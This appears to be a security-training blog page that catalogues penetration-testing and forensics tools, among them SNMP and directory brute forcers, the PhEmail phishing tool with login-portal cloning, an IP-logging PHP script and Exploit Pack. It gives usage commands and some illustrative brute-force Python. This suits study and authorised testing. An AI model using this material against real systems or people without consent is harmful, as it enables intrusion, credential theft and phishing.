The White Hat Hacker Capital: Buôn Ma Thuột

Vietnam's White Hat Hacker training program in the city of Buôn Ma Thuột, combined with tourism. Arrive as a newbie - leave as a WHITE HAT HACKER!

Hacking and Penetration Testing with Metasploit

A Security365 training program on using the Metasploit Framework for penetration testing and hacking.

C50 Computer Forensics Materials

Study materials on digital forensics (CHFI) compiled by Security365 for training courses at C50.

Students with Hacking and Information Security

A student hacking competition, with web attack challenges for students built on the Hackademic Challenge platform.

Attack and Defense with BackTrack / Kali Linux

An attack and defense course using BackTrack and Kali Linux, the hackers' professional toolkits, based on Offensive Security material.

Showing posts with label Mac. Show all posts

PackETH - Ethernet Packet Generator


PackETH is a GUI and CLI packet generator tool for Ethernet. It allows you to create and send any possible packet or sequence of packets on the Ethernet link. It is simple to use, powerful, and supports many parameter adjustments while sending a sequence of packets. And lastly, it has the most beautiful web site of all the packet generators.

Features & Video

  • you can create and send any ethernet packet. Supported protocols:
    • ethernet II, ethernet 802.3, 802.1q, QinQ, user defined ethernet frame
    • ARP, IPv4, IPv6, user defined network layer payload
    • UDP, TCP, ICMP, ICMPv6, IGMP, user defined transport layer payload
    • RTP (payload with options to send a sine wave of any frequency for G.711)
    • JUMBO frames (if network driver supports it)
  • sending sequence of packets
    • delay between packets, number of packets to send
    • sending with max speed, approaching the theoretical boundary
    • change parameters while sending (change IP & MAC address, UDP payload, 2 user defined bytes, etc.)
  • saving configuration to a file and loading from it - pcap format supported
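To get a feel for what a packet generator assembles under the hood, here is a minimal Python sketch (an illustration, not part of PackETH) that builds a raw Ethernet II frame; the MAC addresses and payload are made up, and actually transmitting the frame would require a raw socket (e.g. AF_PACKET on Linux) with root privileges:

```python
import struct

def ethernet_frame(dst: str, src: str, ethertype: int, payload: bytes) -> bytes:
    """Assemble an Ethernet II frame: 6-byte dst MAC, 6-byte src MAC,
    2-byte EtherType, then payload, padded to the 60-byte minimum
    (the NIC appends the 4-byte FCS to reach 64 bytes on the wire)."""
    def mac(addr: str) -> bytes:
        return bytes(int(octet, 16) for octet in addr.split(":"))
    frame = mac(dst) + mac(src) + struct.pack("!H", ethertype) + payload
    return frame + b"\x00" * max(0, 60 - len(frame))

# Broadcast frame carrying an IPv4 EtherType (0x0800) and a dummy payload
frame = ethernet_frame("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", 0x0800, b"hello")
```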


SNMP Brute - Fast SNMP brute force, enumeration, CISCO config downloader and password cracking script

SNMP brute force, enumeration, CISCO config downloader and password cracking script. Listens for any responses to the brute force community strings, effectively minimising wait time.

Requirements
  • metasploit
  • snmpwalk
  • snmpstat
  • john the ripper

Usage
python snmp-brute.py -t [IP]


Options
--help, -h show this help message and exit
--file=DICTIONARY, -f DICTIONARY Dictionary file
--target=IP, -t IP Host IP
--port=PORT, -p PORT SNMP port


Advanced
--rate=RATE, -r RATE Send rate
--timeout=TIMEOUT Wait time for UDP response (in seconds)
--delay=DELAY Wait time after all packets are send (in seconds)
--iplist=LFILE IP list file
--verbose, -v Verbose output


Automation
--bruteonly, -b Do not try to enumerate - only bruteforce
--auto, -a Non Interactive Mode
--no-colours No colour output


Operating Systems
--windows Enumerate Windows OIDs (snmpenum.pl)
--linux Enumerate Linux OIDs (snmpenum.pl)
--cisco Append extra Cisco OIDs (snmpenum.pl)


Alternative Options
--stdin, -s Read communities from stdin
--community=COMMUNITY, -c COMMUNITY Single Community String to use
--sploitego Sploitego's bruteforce method


Features
  • Brute forces both version 1 and version 2c SNMP community strings
  • Enumerates information for CISCO devices or, if specified, for Linux and Windows operating systems.
  • Identifies RW community strings
  • Tries to download the router config (metasploit module).
  • If the CISCO config file is downloaded, shows the plaintext passwords (metasploit module) and tries to crack hashed passwords with John the Ripper
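To see why "listening for responses" works, it helps to look at what a single probe actually is: a tiny BER-encoded SNMPv1 GetRequest sent over UDP/161. The sketch below (an illustration, not snmp-brute.py's actual code) builds such a packet for one candidate community string; a brute forcer fires one per candidate, and any device that answers has accepted that community:

```python
def tlv(tag: int, payload: bytes) -> bytes:
    # Short-form BER length octet is enough for packets under 128 bytes
    return bytes([tag, len(payload)]) + payload

def snmp_get_request(community: bytes, oid: bytes, request_id: int = 1) -> bytes:
    varbind = tlv(0x30, oid + tlv(0x05, b""))       # OID + NULL value
    pdu = tlv(0xA0,                                 # GetRequest PDU
              tlv(0x02, bytes([request_id])) +      # request-id
              tlv(0x02, b"\x00") +                  # error-status = 0
              tlv(0x02, b"\x00") +                  # error-index = 0
              tlv(0x30, varbind))                   # variable bindings
    return tlv(0x30,                                # SNMP message
               tlv(0x02, b"\x00") +                 # version 0 = SNMPv1
               tlv(0x04, community) +               # community string
               pdu)

# sysDescr.0 = 1.3.6.1.2.1.1.1.0, pre-encoded as a BER OID
SYSDESCR = tlv(0x06, b"\x2b\x06\x01\x02\x01\x01\x01\x00")
pkt = snmp_get_request(b"public", SYSDESCR)
```

Each candidate packet would then be sent with a plain UDP socket to port 161 while a listener collects whatever replies come back.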


Dirs3arch v0.3.0 - HTTP(S) Directory/File Brute Forcer


dirs3arch is a simple command line tool designed to brute force hidden directories and files in websites.

It's written in Python 3 and all third-party libraries are included.

Operating Systems supported
  • Windows XP/7/8
  • GNU/Linux
  • MacOSX

Features
  • Multithreaded
  • Keep alive connections
  • Support for multiple extensions (-e|--extensions asp,php)
  • Reporting (plain text, JSON)
  • Detects valid pages even when 404 errors are masked (.htaccess, web.config, etc.)
  • Recursive brute forcing
  • HTTP(S) proxy support
  • Batch processing (-L)

Examples
  • Scan www.example.com/admin/ to find php files:
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php
  • Scan www.example.com to find asp and aspx files with SSL:
    python3 dirs3arch.py -u https://www.example.com/ -e asp,aspx
  • Scan www.example.com with an alternative dictionary (from DirBuster):
    python3 dirs3arch.py -u http://www.example.com/ -e php -w db/dirbuster/directory-list-2.3-small.txt
  • Scan with HTTP proxy (localhost port 8080):
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --http-proxy localhost:8080
  • Scan with custom User-Agent and custom header (Referer):
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --user-agent "My User-Agent" --header "Referer: www.google.com"
  • Scan recursively:
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php -r
  • Scan recursively excluding server-status directory and 200 status codes:
    python3 dirs3arch.py -u http://www.example.com/ -e php -r --exclude-subdir "server-status" --exclude-status 200
  • Scan includes, classes directories in /admin/
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --scan-subdir "includes, classes"
  • Scan without following HTTP redirects:
    python3 dirs3arch.py -u http://www.example.com/ -e php --no-follow-redirects
  • Scan VHOST "backend" at IP 192.168.1.1:
    python3 dirs3arch.py -u http://backend/ --ip 192.168.1.1
  • Scan www.example.com to find wordpress plugins:
    python3 dirs3arch.py -u http://www.example.com/wordpress/wp-content/plugins/ -e php -w db/wordpress/plugins.txt

  • Batch processing:
    python3 dirs3arch.py -L urllist.txt -e php
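The core loop of a tool like this is small. Below is a hedged Python 3 sketch (not dirs3arch's actual code) of multithreaded path brute forcing: expand a wordlist with the requested extensions, probe each path concurrently, and keep everything that is not a 404:

```python
import http.client
from concurrent.futures import ThreadPoolExecutor

def probe(host: str, port: int, path: str):
    """Request a single path and return (path, HTTP status)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("HEAD", path)
        return path, conn.getresponse().status
    finally:
        conn.close()

def brute(host: str, port: int, words, extensions, threads: int = 8):
    """Try every word bare and with each extension; report non-404 hits."""
    paths = ["/%s.%s" % (w, e) if e else "/" + w
             for w in words for e in [""] + list(extensions)]
    with ThreadPoolExecutor(max_workers=threads) as pool:
        results = pool.map(lambda p: probe(host, port, p), paths)
    return [(path, status) for path, status in results if status != 404]
```

A real tool additionally has to fingerprint "masked" 404s, e.g. by requesting a random nonexistent path first and treating any response that looks like it as not found.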


Thirdparty code
  • colorama
  • oset
  • urllib3
  • sqlmap

Changelog
  • 0.3.0 - 2015.2.5 Fixed issue3, fixed timeout exception, ported to Python 3, other bugfixes
  • 0.2.7 - 2014.11.21 Added Url List feature (-L). Changed output. Minor Fixes
  • 0.2.6 - 2014.9.12 Fixed bug when dictionary size is greater than threads count. Fixed URL encoding bug (issue2).
  • 0.2.5 - 2014.9.2 Shows Content-Length in output and reports, added default.conf file (for setting defaults) and report auto save feature added.
  • 0.2.4 - 2014.7.17 Added Windows support, --scan-subdir|--scan-subdirs argument added, --exclude-subdir|--exclude-subdirs added, --header argument added, dirbuster dictionaries added, fixed some concurrency bugs, MVC refactoring
  • 0.2.3 - 2014.7.7 Fixed some bugs, minor refactorings, exclude status switch, "pause/next directory" feature, changed help structure, expaded default dictionary
  • 0.2.2 - 2014.7.2 Fixed some bugs, showing percentage of tested paths and added report generation feature
  • 0.2.1 - 2014.5.1 Fixed some bugs and added recursive option
  • 0.2.0 - 2014.1.31 Initial public release

IP Thief - Simple IP Stealer in PHP


A simple PHP script that captures the IP address of anyone who opens the "imagen.php" file, with the following options:
[+] It comes with an administration panel to view and delete IPs
[+] You can change the redirect image URL
[+] You can see the visitor's country


Socat - Multipurpose relay (SOcket CAT)

Socat is a utility similar to the venerable Netcat that works over a number of protocols and through files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.

Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes.

Filan is a utility that prints information about its active file descriptors to stdout. It was written for debugging socat, but might be useful for other purposes too. Use the -h option to find more information.

Procan is a utility that prints information about process parameters to stdout. It has been written to better understand some UNIX process properties and for debugging socat, but might be useful for other purposes too.

The life cycle of a socat instance typically consists of four phases.

In the init phase, the command line options are parsed and logging is initialized.

During the open phase, socat opens the first address and afterwards the second address. These steps are usually blocking; thus, especially for complex address types like socks, connection requests or authentication dialogs must be completed before the next step is started.

In the transfer phase, socat watches both streams' read and write file descriptors via select(), and, when data is available on one side and can be written to the other side, socat reads it, performs newline character conversions if required, and writes the data to the write file descriptor of the other stream, then continues waiting for more data in both directions.

When one of the streams effectively reaches EOF, the closing phase begins. Socat transfers the EOF condition to the other stream, i.e. tries to shutdown only its write stream, giving it a chance to terminate gracefully. For a defined time socat continues to transfer data in the other direction, but then closes all remaining channels and terminates.
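The transfer and closing phases described above can be sketched in a few lines. The following Python snippet (an illustration of the select()-based loop, not socat's own code) relays bytes between two connected sockets and propagates EOF by shutting down only the peer's write side, giving each direction a chance to finish independently:

```python
import select
import socket

def relay(left: socket.socket, right: socket.socket) -> None:
    """Shuttle bytes both ways until each direction has seen EOF."""
    peer = {left: right, right: left}
    readable_set = {left, right}
    while readable_set:
        ready, _, _ = select.select(list(readable_set), [], [])
        for sock in ready:
            data = sock.recv(8192)
            if data:
                peer[sock].sendall(data)
            else:
                # EOF on this direction: stop reading it, and close only
                # the peer's write side so the other direction can finish
                readable_set.discard(sock)
                try:
                    peer[sock].shutdown(socket.SHUT_WR)
                except OSError:
                    pass
    left.close()
    right.close()
```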

OPTIONS

Socat provides some command line options that modify the behaviour of the program. They have nothing to do with so called address options that are used as parts of address specifications.

-V
Print version and available feature information to stdout, and exit.
-h | -?
Print a help text to stdout describing command line options and available address types, and exit.
-hh | -??
Like -h, plus a list of the short names of all available address options. Some options are platform dependent, so this output is helpful for checking the particular implementation.
-hhh | -???
Like -hh, plus a list of all available address option names.
-d
Without this option, only fatal and error messages are generated; applying this option also prints warning messages. See DIAGNOSTICS for more information.
-d -d
Prints fatal, error, warning, and notice messages.
-d -d -d
Prints fatal, error, warning, notice, and info messages.
-d -d -d -d
Prints fatal, error, warning, notice, info, and debug messages.
-D
Logs information about file descriptors before starting the transfer phase.
-ly[<facility>]
Writes messages to syslog instead of stderr; severity as defined with -d option. With optional <facility>, the syslog type can be selected, default is "daemon". Third party libraries might not obey this option.
-lf <logfile>
Writes messages to <logfile> [filename] instead of stderr. Some third party libraries, in particular libwrap, might not obey this option.
-ls
Writes messages to stderr (this is the default). Some third party libraries might not obey this option, in particular libwrap appears to only log to syslog.
-lp<progname>
Overrides the program name printed in error messages and used for constructing environment variable names.
-lu
Extends the timestamp of error messages to microsecond resolution. Does not work when logging to syslog.
-lm[<facility>]
Mixed log mode. During startup messages are printed to stderr; when socat starts the transfer phase loop or daemon mode (i.e. after opening all streams and before starting data transfer, or, with listening sockets with fork option, before the first accept call), it switches logging to syslog. With optional <facility>, the syslog type can be selected, default is "daemon".
-lh
Adds hostname to log messages. Uses the value from environment variable HOSTNAME or the value retrieved with uname() if HOSTNAME is not set.
-v
Writes the transferred data not only to their target streams, but also to stderr. The output format is text with some conversions for readability, and prefixed with "> " or "< " indicating flow directions.
-x
Writes the transferred data not only to their target streams, but also to stderr. The output format is hexadecimal, prefixed with "> " or "< " indicating flow directions. Can be combined with -v.
-b<size>
Sets the data transfer block <size> [size_t]. At most <size> bytes are transferred per step. Default is 8192 bytes.
-s
By default, socat terminates when an error occurred to prevent the process from running when some option could not be applied. With this option, socat is sloppy with errors and tries to continue. Even with this option, socat will exit on fatals, and will abort connection attempts when security checks failed.
-t<timeout>
When one channel has reached EOF, the write part of the other channel is shut down. Then, socat waits <timeout> [timeval] seconds before terminating. Default is 0.5 seconds. This timeout only applies to addresses where write and read part can be closed independently. When during the timeout interval the read part gives EOF, socat terminates without awaiting the timeout.
-T<timeout>
Total inactivity timeout: when socat is already in the transfer loop and nothing has happened for <timeout> [timeval] seconds (no data arrived, no interrupt occurred...) then it terminates. Useful with protocols like UDP that cannot transfer EOF.
-u
Uses unidirectional mode. The first address is only used for reading, and the second address is only used for writing (example).
-U
Uses unidirectional mode in reverse direction. The first address is only used for writing, and the second address is only used for reading.
-g
During address option parsing, don't check if the option is considered useful in the given address environment. Use it if you want to force, e.g., applying a socket option to a serial device.
-L<lockfile>
If lockfile exists, exits with error. If lockfile does not exist, creates it and continues, unlinks lockfile on exit.
-W<lockfile>
If lockfile exists, waits until it disappears. When lockfile does not exist, creates it and continues, unlinks lockfile on exit.
-4
Use IP version 4 in case that the addresses do not implicitly or explicitly specify a version; this is the default.
-6
Use IP version 6 in case that the addresses do not implicitly or explicitly specify a version. 


PhEmail - Automate Sending Phishing Emails


PhEmail is an open source Python phishing email tool that automates the process of sending phishing emails as part of a social engineering test. The main purpose of PhEmail is to send a bunch of phishing emails and prove who clicked on them, without attempting to exploit the web browser or email client, while collecting as much information as possible. PhEmail comes with an engine to gather email addresses through LinkedIn, useful during the information gathering phase. This tool also supports Gmail authentication, which is a valid option in case the target domain has blacklisted the source email or IP address. Finally, it can be used to clone corporate login portals in order to steal login credentials.

Usage

PHishing EMAIL tool v0.13
Usage: phemail.py [-e <emails>] [-m <mail_server>] [-f <from_address>] [-r <reply_address>] [-s <subject>] [-b <body>]
-e emails: File containing list of emails (Default: emails.txt)
-f from_address: Source email address displayed in FROM field of the email (Default: Name Surname <name_surname@example.com>)
-r reply_address: Actual email address used to send the emails in case that people reply to the email (Default: Name Surname <name_surname@example.com>)
-s subject: Subject of the email (Default: Newsletter)
-b body: Body of the email (Default: body.txt)
-p pages: Specifies number of results pages searched (Default: 10 pages)
-v verbose: Verbose Mode (Default: false)
-l layout: Send email with no embedded pictures
-B BeEF: Add the hook for BeEF
-m mail_server: SMTP mail server to connect to
-g Google: Use a google account username:password
-t time_delay: Add delay between each email (Default: 3 sec)
-R batch: Number of emails to send per batch (Default: 10 emails)
-L webserver_log: Customise the name of the webserver log file (Default: date-time in format "%d_%m_%Y_%H_%M")
-S search: Search query on Google
-d domain: Domain of the email addresses
-n number: Number of emails per connection (Default: 10 emails)
-c clone: Clone a web page
-w website: Website where the phishing email link points to
-o output: Save output in a file
-F Format (Default: 0):
0- firstname surname
1- firstname.surname@example.com
2- firstnamesurname@example.com
3- f.surname@example.com
4- firstname.s@example.com
5- surname.firstname@example.com
6- s.firstname@example.com
7- surname.f@example.com
8- surnamefirstname@example.com
9- firstname_surname@example.com

Examples: phemail.py -e emails.txt -f "Name Surname <name_surname@example.com>" -r "Name Surname <name_surname@example.com>" -s "Subject" -b body.txt
phemail.py -S example -d example.com -F 1 -p 12
phemail.py -c https://example.com
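The -F formats above are just string templates applied to harvested names. A small illustrative generator (not PhEmail's actual code; the names and domain below are placeholders) might look like this:

```python
def make_email(first: str, last: str, domain: str, fmt: int) -> str:
    """Build an email address from a first/last name using the -F formats."""
    f, l = first.lower(), last.lower()
    templates = {
        0: "{f} {l}",        # firstname surname (no address form)
        1: "{f}.{l}@{d}",    # firstname.surname@example.com
        2: "{f}{l}@{d}",     # firstnamesurname@example.com
        3: "{f0}.{l}@{d}",   # f.surname@example.com
        4: "{f}.{l0}@{d}",   # firstname.s@example.com
        5: "{l}.{f}@{d}",    # surname.firstname@example.com
        6: "{l0}.{f}@{d}",   # s.firstname@example.com
        7: "{l}.{f0}@{d}",   # surname.f@example.com
        8: "{l}{f}@{d}",     # surnamefirstname@example.com
        9: "{f}_{l}@{d}",    # firstname_surname@example.com
    }
    return templates[fmt].format(f=f, l=l, d=domain, f0=f[0], l0=l[0])
```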


Disclaimer

Usage of PhEmail for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.


JADX - Java source code from Android Dex and Apk files


Command line and GUI tools for producing Java source code from Android Dex and Apk files.

Usage

jadx[-gui] [options] <input file> (.dex, .apk, .jar or .class)
options:
-d, --output-dir - output directory
-j, --threads-count - processing threads count
-f, --fallback - make simple dump (using goto instead of 'if', 'for', etc)
--cfg - save methods control flow graph to dot file
--raw-cfg - save methods control flow graph (use raw instructions)
-v, --verbose - verbose output
-h, --help - print this help
Example:
jadx -d out classes.dex


MalwaRE - Malware Repository Framework


malwaRE is a malware repository website created using the PHP Laravel framework, used to manage your own malware zoo. malwaRE is based on the work of the Adlice team, with some extra features.

If you guys have any improvements, please let me know or send me a pull request.

Features
  • Self-hosted solution (PHP/Mysql server needed)
  • VirusTotal results (option for uploading unknown samples)
  • Search filters available (vendor, filename, hash, tag)
  • Vendor name is picked from VirusTotal results in that order: Microsoft, Kaspersky, Bitdefender
  • Add writeup url(s) for each sample
  • Manage samples by tag
  • Tag autocomplete
  • VirusTotal rescan button (VirusTotal's score column)
  • Download samples from repository

CapTipper - Malicious HTTP traffic explorer tool


CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic.

CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.

The tool provides the security researcher with easy access to the files and an understanding of the network flow, and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes.
Feeding CapTipper a drive-by traffic capture (e.g. of an exploit kit) presents the user with the request URIs that were sent and the response metadata.

The user can at this point browse to http://127.0.0.1/[URI] and receive the response back to the browser.

In addition, an interactive shell is launched for deeper investigation using various commands such as: hosts, hexdump, info, ungzip, body, client, dump and more...



Ghiro 0.2 - Automated Digital Image Forensics Tool


Sometimes forensic investigators need to process digital images as evidence. There are some tools around; without them it is difficult to deal with forensic analysis when lots of images are involved.

Images contain tons of information; Ghiro extracts this information from the provided images and displays it in a nicely formatted report.

Dealing with tons of images is pretty easy; Ghiro is designed to scale to support gigabytes of images.

All tasks are totally automated: you just have to upload your images and let Ghiro do the work.

Understandable reports and great search capabilities allow you to find a needle in a haystack.

Ghiro is a multi-user environment; different permissions can be assigned to each user. Cases allow you to group image analyses by topic, and you can choose which users are allowed to see your case with a permission schema.

Use Cases

Ghiro can be used in many scenarios: forensic investigators could use it on a daily basis in their analysis lab, but people interested in uncovering secrets hidden in images can benefit too. Some example use cases are the following:
  • If you need to extract all data and metadata hidden in an image in a fully automated way
  • If you need to analyze a lot of images and do not have much time to read the report for all of them
  • If you need to search a bunch of images for some metadata
  • If you need to geolocate a bunch of images and see them on a map
  • If you have a hash list of "special" images and you want to search for them

Anyway, Ghiro is designed to be used in many other scenarios; imagination is the only limit.

MAIN FEATURES

Metadata extraction

Metadata are divided into several categories depending on the standard they come from. Image metadata are extracted and categorized, for example: EXIF, IPTC, XMP.

GPS Localization

Embedded in the image metadata there is sometimes a geotag: a bit of GPS data providing the longitude and latitude of where the photo was taken. It is read, and the position is displayed on a map.
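EXIF stores the geotag as degree/minute/second rationals plus a hemisphere reference; turning that into a map position is one line of arithmetic. A small illustrative conversion (not Ghiro's code; the sample coordinates are made up):

```python
def dms_to_decimal(degrees: float, minutes: float, seconds: float, ref: str) -> float:
    """Convert an EXIF-style GPS triplet to signed decimal degrees.
    ref is the hemisphere reference: N/E positive, S/W negative."""
    value = degrees + minutes / 60.0 + seconds / 3600.0
    return -value if ref in ("S", "W") else value

# 40 deg 26' 46" N  ->  about 40.4461
lat = dms_to_decimal(40, 26, 46, "N")
```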

MIME information

The image MIME type is detected to know the image type you are dealing with, in both contracted (example: image/jpeg) and extended form.

Error Level Analysis

Error Level Analysis (ELA) identifies areas within an image that are at different compression levels. The entire picture should be at roughly the same level; if a difference is detected, it likely indicates a digital modification.

Thumbnail extraction

The thumbnails and data related to them are extracted from image metadata and stored for review.

Thumbnail consistency

Sometimes when a photo is edited, the original image is modified but the thumbnail is not. Differences between the thumbnail and the image are detected.

Signature engine 

Over 120 signatures provide evidence about most critical data to highlight focal points and common exposures.

Hash matching

Suppose you are searching for an image and you have only the hash. You can provide a list of hashes and all images matching are reported.
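Hash matching boils down to hashing every analyzed file and intersecting the digests with the supplied list. An illustrative sketch (Ghiro supports its own set of hash types; this example uses SHA-256):

```python
import hashlib
from pathlib import Path

def find_matches(image_dir: str, wanted_hashes: set) -> list:
    """Return paths under image_dir whose SHA-256 digest is in wanted_hashes."""
    matches = []
    for path in Path(image_dir).iterdir():
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            if digest in wanted_hashes:
                matches.append(str(path))
    return matches
```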


Gitrob - Reconnaissance tool for GitHub organizations


Gitrob is a command line tool that can help organizations and security professionals find sensitive information exposed on GitHub. The tool iterates over all public organization and member repositories and matches filenames against a range of patterns for files that typically contain sensitive or dangerous information.

How it works

Looking for sensitive information in GitHub repositories is not a new thing; it has been known for a while that things such as private keys and credentials can be found with GitHub's search functionality. However, Gitrob makes it easier to focus the effort on a specific organization.

The first thing the tool does is to collect all public repositories of the organization itself. It then goes on to collect all the organization members and their public repositories, in order to compile a list of repositories that might be related or have relevance to the organization.

When the list of repositories has been compiled, it proceeds to gather all the filenames in each repository and runs them through a series of observers that will flag the files, if they match any patterns of known sensitive files. This step might take a while if the organization is big or if the members have a lot of public repositories.

All of the members, repositories and files will be saved to a PostgreSQL database. When everything has been sifted through, it will start a Sinatra web server locally on the machine, which will serve a simple web application to present the collected data for analysis.
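The filename-flagging step is essentially glob matching against a signature list. A toy version in Python (Gitrob itself ships a much larger signature set; the patterns below are a small, illustrative subset):

```python
import fnmatch

# Illustrative subset of "sensitive file" signatures
SIGNATURES = ["*.pem", "*.key", "id_rsa", "id_dsa", ".env",
              "*.sqlite", "*_history", "*.keychain"]

def flag_sensitive(filenames):
    """Return the filenames matching any known sensitive-file pattern."""
    return [name for name in filenames
            if any(fnmatch.fnmatch(name, pat) for pat in SIGNATURES)]
```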


Exploit Pack - Open Source Security Project for Penetration Testing and Exploit Development


Exploit Pack is an open source GPLv3 security tool; this means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Impact are ready to use as well, but you will require an expensive license to get access to all the features, for example: automatic exploit launching, full reporting capabilities, reverse shell agent customization, etc. Because this is an open source project you can always modify it, add or replace features, and get involved in the next project decisions; everyone is more than welcome to participate. We developed this tool thinking for and as pentesters. As security professionals we use Exploit Pack on a daily basis to deploy real-environment attacks against real corporate clients.


More than 300 exploits

Military grade professional security tool

Exploit Pack comes into the scene when you need to execute a pentest in a real environment; it provides you with all the tools needed to gain access and persist through the use of remote reverse agents.

Remote Persistent Agents

Reverse a shell and escalate privileges

Exploit Pack will provide you with a complete set of features to create your own custom agents, you can include exploits or deploy your own personalized shellcodes directly into the agent.

Write your own Exploits

Use Exploit Pack as a learning platform

Quick exploit development: extend your capabilities and code your own custom exploits using the Exploit Wizard and the built-in Python editor, modified to fulfill the needs of an exploit writer.


ProGuard - Java class file Shrinker, Optimizer, Obfuscator and Preverifier


ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes. It optimizes bytecode and removes unused instructions. It renames the remaining classes, fields, and methods using short meaningless names. Finally, it preverifies the processed code for Java 6 or higher, or for Java Micro Edition. 

Some uses of ProGuard are:
  • Creating more compact code, for smaller code archives, faster transfer across networks, faster loading, and smaller memory footprints.
  • Making programs and libraries harder to reverse-engineer.
  • Listing dead code, so it can be removed from the source code.
  • Retargeting and preverifying existing class files for Java 6 or higher, to take full advantage of their faster class loading.

ProGuard's main advantage compared to other Java obfuscators is probably its compact template-based configuration. A few intuitive command line options or a simple configuration file are usually sufficient. The user manual explains all available options and shows examples of this powerful configuration style.

ProGuard is fast. It only takes seconds to process programs and libraries of several megabytes. The results section presents actual figures for a number of applications.

ProGuard is a command-line tool with an optional graphical user interface. It also comes with plugins for Ant, for Gradle, and for the JME Wireless Toolkit.


What is shrinking?

Java source code (.java files) is typically compiled to bytecode (.class files). Bytecode is more compact than Java source code, but it may still contain a lot of unused code, especially if it includes program libraries. Shrinking programs such as ProGuard can analyze bytecode and remove unused classes, fields, and methods. The program remains functionally equivalent, including the information given in exception stack traces.

What is obfuscation?

By default, compiled bytecode still contains a lot of debugging information: source file names, line numbers, field names, method names, argument names, variable names, etc. This information makes it straightforward to decompile the bytecode and reverse-engineer entire programs. Sometimes, this is not desirable. Obfuscators such as ProGuard can remove the debugging information and replace all names by meaningless character sequences, making it much harder to reverse-engineer the code. It further compacts the code as a bonus. The program remains functionally equivalent, except for the class names, method names, and line numbers given in exception stack traces.

What is preverification?

When loading class files, the class loader performs some sophisticated verification of the byte code. This analysis makes sure the code can't accidentally or intentionally break out of the sandbox of the virtual machine. Java Micro Edition and Java 6 introduced split verification. This means that the JME preverifier and the Java 6 compiler add preverification information to the class files (StackMap and StackMapTable attributes, respectively), in order to simplify the actual verification step for the class loader. Class files can then be loaded faster and in a more memory-efficient way. ProGuard can perform the preverification step too, for instance allowing older class files to be retargeted at Java 6.

What kind of optimizations does ProGuard support?

Apart from removing unused classes, fields, and methods in the shrinking step, ProGuard can also perform optimizations at the bytecode level, inside and across methods. Thanks to techniques like control flow analysis, data flow analysis, partial evaluation, static single assignment, global value numbering, and liveness analysis, ProGuard can:
  • Evaluate constant expressions.
  • Remove unnecessary field accesses and method calls.
  • Remove unnecessary branches.
  • Remove unnecessary comparisons and instanceof tests.
  • Remove unused code blocks.
  • Merge identical code blocks.
  • Reduce variable allocation.
  • Remove write-only fields and unused method parameters.
  • Inline constant fields, method parameters, and return values.
  • Inline methods that are short or only called once.
  • Simplify tail recursion calls.
  • Merge classes and interfaces.
  • Make methods private, static, and final when possible.
  • Make classes static and final when possible.
  • Replace interfaces that have single implementations.
  • Perform over 200 peephole optimizations, like replacing ...*2 by ...<<1.
  • Optionally remove logging code.
The positive effects of these optimizations will depend on your code and on the virtual machine on which the code is executed. Simple virtual machines may benefit more than advanced virtual machines with sophisticated JIT compilers. At the very least, your bytecode may become a bit smaller.
Some notable optimizations that aren't supported yet:
  • Moving constant expressions out of loops.
  • Optimizations that require escape analysis (DexGuard does).
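To make the peephole idea concrete, here is a toy pass in Python over a made-up stack-machine instruction list; it performs the strength reduction mentioned above (multiply-by-power-of-two becomes a shift). This is purely illustrative and unrelated to ProGuard's actual bytecode representation:

```python
def peephole(instructions):
    """Replace PUSH 2^k; MUL with PUSH k; SHL (strength reduction)."""
    out = []
    i = 0
    while i < len(instructions):
        op = instructions[i]
        nxt = instructions[i + 1] if i + 1 < len(instructions) else None
        # A power of two has exactly one bit set: n > 0 and n & (n-1) == 0
        if (op[0] == "PUSH" and op[1] > 0 and op[1] & (op[1] - 1) == 0
                and nxt == ("MUL",)):
            out.append(("PUSH", op[1].bit_length() - 1))  # shift amount k
            out.append(("SHL",))
            i += 2
        else:
            out.append(op)
            i += 1
    return out
```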

Tribler - Download Torrents using Tor-inspired onion routing


Tribler is a research project of Delft University of Technology. Tribler was created over nine years ago as a new open source Peer-to-Peer file sharing program. During this time over one million users have installed it successfully and three generations of Ph.D. students tested their algorithms in the real world.

Tribler is the first client that continuously improves upon the aging BitTorrent protocol from 2001 and addresses its flaws. We have expanded it with, among other things, streaming from magnet links, keyword search for content, channels, and reputation management. All these features are implemented in a completely distributed manner, without relying on any centralized component. Still, Tribler remains fully backwards compatible with BitTorrent.

Work on Tribler has been supported by multiple European Internet research grants. In total we have received 3,538,609 Euro in funding for our open source self-organising systems research.
Roughly 10 to 15 scientists and engineers work on it full-time. Our ambition is to make darknet technology, security, and privacy the default for all Internet users. As of 2013 we have received code from 46 contributors, totalling 143,705 lines of code.

Vision & Mission

"Push the boundaries of self-organising systems, robust reputation systems and craft collaborative systems with millions of active participants under continuous attack from spammers and other adversarial entities."


Crowbar - Brute Forcing Tool for Pentests


Crowbar is a brute-forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner than other popular brute-forcing tools. For example, while most brute-forcing tools use a username and password for SSH brute force, Crowbar uses SSH keys. SSH keys obtained during penetration tests can thus be used to attack other SSH servers.

Currently Crowbar supports:
  • OpenVPN
